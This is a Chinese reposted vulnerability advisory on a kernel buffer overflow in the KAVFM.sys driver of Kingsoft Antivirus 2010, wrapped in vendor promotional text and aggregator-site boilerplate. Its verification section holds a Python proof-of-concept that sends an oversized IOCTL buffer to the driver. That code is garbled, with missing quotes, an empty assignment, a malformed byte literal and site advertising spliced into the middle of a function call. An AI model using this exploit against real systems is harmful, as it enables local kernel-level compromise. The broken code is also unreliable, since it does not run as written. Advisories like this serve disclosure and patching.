金山毒霸KAVFM.sys驱动IOCTL处理内核缓冲区溢出漏洞及修好1

金山毒霸打造从云到端的整体防御。产品研发部自豪的称这个版本拥有三个之最：安装包最小；新病毒的响应速度最快；系统的资源开销最小。独创可信云安全，运用云杀毒，联网即可享有最新的病毒防杀能力。

影响版本:
Kingsoft Antivirus 2010.04.26.648

漏洞描述:

金山毒霸是一种个人电脑安全防护软件，集合了查毒、杀毒、实时监控、垃圾邮件过滤、防网页挂马和隐私数据保护等实用性强的功能于一身。

本地用户可以通过向金山毒霸所安装的KAVFM.sys驱动提交恶意IOCTL请求触发缓冲区溢出，导致执行任意内核态代码。

<*参考
Lufeng Li （lilf@neusoft.com）

http://secunia.com/advisories/41393/
*>
验证:

#!/usr/bin/python

#################################################################
#
# Title: Kingsoft Antivirus Kernel Buffer Overflow Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: www.duba.net
# Platform: Windows XPSP3 Chinese Simplified
# Tested: Kingsoft Antivirus v2010.04.26.648
# Vulnerable: Kingsoft Antivirus <=v2010.04.26.648
# Vulnerable App: http://down10b.zol.com.cn/shadu/KAV100625_DOWN_10_166.zip?key=314e0cb9ea82720d90caae96bb918009
#################################################################
# Code :
from ctypes import *

kernel32 = windll.kernel32
Psapi    = windll.Psapi

if __name__ == __main__:
    GENERIC_READ = 0x80000000
    GENERIC_WRITE = 0x40000000
    OPEN_EXISTING = 0x3
    CREATE_ALWAYS = 0x2

    DEVICE_NAME   = "\\.\kavfm"
    dwReturn      = c_ulong()
    out_size      = 1024
    in_size       = 1024
    in_data       =
    driver_handle1 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ

软件推荐：

(专业提供下载)

GENERIC_WRITE,
                        0, None, CREATE_ALWAYS, 0, None)
    in_data=1024*x80
    dev_ioctl = kernel32.DeviceIoControl(driver_handle1, 0x80030004, in_data,500, 0, 0,byref(dwReturn), None)
厂商补丁：

Kingsoft Corp
-------------
建议使用此软件的用户关注厂商的主页以获取最新版本：

http://www.kingsoft.com/

就爱阅读www.92to.com网友整理上传,为您提供最全的知识大全,期待您的分享，转载请注明出处。

金山毒霸在“系统防御”外多一层“边界防御”，基于金山云安全，严防病毒木马进入电脑的入口，拦截于系统之外。上网安全保护，聊天安全保护，看片安全保护，网络下载保护，U盘实时保护，层层防护，保护爱机不受病毒侵害。

……

标签:金山修复金山毒霸杀毒软件